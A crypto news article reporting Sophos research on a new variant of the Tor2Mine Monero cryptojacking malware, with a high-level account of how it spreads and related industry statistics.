Security researchers detect new variant of Monero mining exploit Tor2Mine

The industry woke up today to the news of Bitmart exchange being exploited to the tune of nearly $200 million in stolen funds through Ethereum and Binance Smart Chain. With exploits becoming commoner and hackers coming up with ingenious ways to install malware, caution is absolutely necessary.

Worth noting, however, that mining campaigns are providing these hackers a low-risk way to earn digital cash by exploiting network vulnerabilities.

Earlier this week, security researchers at Sophos warned of the return of Tor2Mine. This is a miner variant that makes use of the Tor gateway to communicate with hacked servers. In fact, it can leverage whole networks of worker machines.

Stealing processing power

This type of cybercrime is known as crypto-jacking, an act where hackers make unauthorized use of foreign devices to mine cryptocurrencies. By siphoning off the energy sources of those devices while staying completely hidden, these miners can obtain new tokens without incurring energy costs.

Most of these miners, including Tor2Mine, carry out these campaigns against Monero. The altcoin appeals to hackers due to its private and untraceable nature.

Here’s how the Tor2Miner works – It uses Microsoft’s PowerShell scripting language to disable pre-existing malware protection in a server and execute a miner payload, which is a stealthy malware designed to farm the resources on a system. It also harvests Windows credentials, using which Tor2Mine spreads and re-infects other systems on the compromised network. If it is not completely eradicated, other systems are not protected.

Sophos further noted that while a surge of infections for Tor2Mine was seen in early 2021, a decline has been accompanied by the introduction of new variants. These likely occur due to minor tweaks by different sets of operators or by the same actors between campaigns.

The anti-virus company also revealed that while two different takes on Tor2Mine have been noted since June, their “underlying game plan is almost always the same.”

That being said, it did conclude,

“Tor2Mine is much more difficult to root out once it’s established a foothold on a network without the assistance of endpoint protection software and other anti-malware measures… it can’t be eliminated just by patching and cleaning one system. The miner will continually attempt to re-infect other systems on the network.”

The only way to escape these miners is by installing anti-malware products that can detect them.

With the spread of cryptocurrency fervor, illegal mining has become an established means to criminally obtain digital assets. A recent cyber security report by Google revealed that 86% of compromised Google Cloud accounts are used for illegal cryptocurrency mining, along with for scanning and attacking other potential targets.

Interestingly, a June report by Kaspersky found that crypto-jacking has fallen from its heyday in 2017-18 during the initial crypto-boom. However, the total number of users who encountered miners on their devices increased to 200,045 in March from 187,746 in January in the first quarter of this year.